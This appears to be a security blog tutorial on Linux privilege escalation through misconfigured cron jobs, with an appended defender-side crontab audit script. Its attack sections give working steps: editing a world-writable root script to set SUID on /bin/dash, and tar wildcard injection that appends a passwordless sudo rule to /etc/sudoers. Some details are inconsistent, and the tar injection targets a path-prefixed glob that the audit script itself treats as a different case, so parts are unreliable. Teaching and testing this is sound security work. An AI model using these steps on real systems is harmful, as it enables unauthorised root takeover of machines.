After looking at a few OSCP challenges, we decided to write an article about various Linux privilege escalation techniques that our readers might find useful in their penetration testing. In this article, we will study "Privilege Escalation with Cron Jobs" to gain root access to a remote host machine, and also look at how an improperly configured cron job can lead to privilege escalation. If you have solved post-exploitation CTF challenges, you will see in this article the weaknesses that lead to privilege escalation.
For details, you can read our previous article where we applied this privilege escalation trick.
What Is a Cron Job?
Cron jobs are used to schedule commands to run on the server at specific dates and times. They are most often used for system administration tasks such as backups or cleaning up /tmp/ directories. The word cron comes from crontab, which is present in the /etc directory.
For example, in crontab we can add the following entry to automatically overwrite the Apache error log:
1 0 * * 3 printf "" > /var/log/apache/error_log
Crontab File Overwrite
Goal: Set up a new crontab job to run a Python script that deletes all data in a specific directory.
Let's say "cleanup" is a directory whose data is automatically deleted every time the job runs. We therefore save some data in /home/cleanup.
mkdir -p /home/cleanup
cd /home/cleanup
echo "Friends" > 1.txt
echo "ALL files will be deleted in 2 minutes" > 2.txt
echo > 1.php
echo > 2.php
ls
As you can see from the image, some files are saved in the cleanup directory.
Now write a Python program in another directory to delete the data in /home/cleanup, and give the script full permissions.
cd /tmp
nano cleanup.py
#!/usr/bin/env python
import os
import sys
try:
    # Delete everything inside the cleanup directory
    os.system('rm -r /home/cleanup/* ')
except:
    sys.exit()
chmod 777 cleanup.py
Finally, schedule a task with crontab to run cleanup.py every 2 minutes.
nano /etc/crontab
*/2 * * * * root /tmp/cleanup.py
chmod 777 /home/cleanup
cd /home/cleanup
ls
date
ls
date
Cool! As you can see, all files are deleted after a few minutes.
Post Exploitation
Start your attacking machine, first compromise the target system, and then proceed to the privilege escalation phase. Let's say I have successfully logged into the victim machine and obtained a non-root user terminal. Run the commands shown below.
cat /etc/crontab
ls -al /tmp/cleanup.py
cat /tmp/cleanup.py
From the steps above, you can see that crontab runs a Python program every 2 minutes; let's exploit that now.
There are many ways to gain root access; in this method, we enable the SUID bit on /bin/dash. It is quite simple: open the file in an editor, for example nano cleanup.py, and replace the "rm -r /tmp/*" line with the following line, as shown below.
os.system('chmod u+s /bin/dash')
After two minutes, the SUID permission will be set on /bin/dash, and root access will be granted each time it is run.
/bin/dash
id
whoami
Crontab Tar Wildcard Injection
Goal: Schedule a task with crontab to back up the HTML directory using the tar archiver.
The directory you are going to back up must have executable permission.
Now schedule a backup job with crontab that runs the tar archiver and backs up /html into /var/backups every minute.
nano /etc/crontab
*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*
Let's check that the schedule is working by looking in the /var/backups directory.
In the image below, you can see that the html.tgz file was created after 1 minute.
Post Exploitation
Start your attacking machine, first compromise the target system, then proceed to the privilege escalation step. Suppose I managed to log into the victim machine through ssh and accessed a non-root user terminal. Then open crontab to see whether any task is scheduled.
cat /etc/crontab
Here we notice that the target has scheduled a tar archive job to run every minute, and we know that the cron job runs as root. Let's try to exploit it.
Run the following commands to grant sudo rights to the logged-in user; this post-exploitation technique is known as wildcard injection.
echo 'echo "ignite ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
Now, after 1 minute, the ignite user is granted sudo rights, as you can confirm with the image below.
sudo -l
sudo bash
whoami
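A defender-side check for the two misconfigurations shown in this article, as an added example that is not part of the original article: it parses /etc/crontab-style text and reports root jobs whose executable is writable by other users, and unquoted globs in root tar jobs, marking a bare glob separately from a path-prefixed one. The function names, finding labels and sample crontab are assumptions constructed for illustration; the last two sample entries do not come from the article.

```python
import os
import shlex
import stat

# Constructed sample: the article's two lab entries, a bare-glob variant, and a non-root job.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
*/2 * * * * root /tmp/cleanup.py
*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*
*/5 * * * * root cd /var/www/html && tar -zcf /var/backups/html.tgz *
17 * * * * www-data /usr/local/bin/rotate.sh
"""

def other_writable(path, stat_fn=os.stat):
    """True if 'other' can edit the file, or swap it via a non-sticky writable parent."""
    try:
        mode = stat_fn(path).st_mode
        parent = stat_fn(os.path.dirname(path) or "/").st_mode
    except OSError:
        return False
    loose_parent = parent & stat.S_IWOTH and not parent & stat.S_ISVTX
    return bool(mode & stat.S_IWOTH or loose_parent)

def audit_crontab(text, stat_fn=os.stat):
    """Return (kind, detail) findings for root jobs in /etc/crontab format."""
    findings = []
    for line in text.splitlines():
        fields = line.split(None, 6)  # m h dom mon dow user command
        if line.lstrip().startswith("#") or len(fields) < 7 or fields[5] != "root":
            continue
        # posix=False keeps quote characters, so a quoted '*' is not mistaken for a glob
        words = shlex.split(fields[6], posix=False)
        if words[0].startswith("/") and other_writable(words[0], stat_fn):
            findings.append(("writable-script", words[0]))
        if any(os.path.basename(w) == "tar" for w in words):
            for w in words:
                if "*" in w and w[0] not in "'\"":
                    # A bare glob expands to names that may begin with "--" and be parsed
                    # as tar options; a path-prefixed glob expands to names starting with that path.
                    kind = "tar-glob-bare" if "/" not in w else "tar-glob-path"
                    findings.append((kind, w))
    return findings

if __name__ == "__main__":
    # To audit a real host: audit_crontab(open("/etc/crontab").read())
    for kind, detail in audit_crontab(SAMPLE_CRONTAB):
        print(kind, detail)
```

The sticky bit on /tmp stops other users from replacing a root-owned file there, so the first finding depends on the script's own mode (777 in the lab), which is why the check looks at both the file and its parent directory.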
Author: Aarti Singh is a technical researcher and author of articles about hacking attacks, and an information consultant for lovers of security, social and networking gadgets.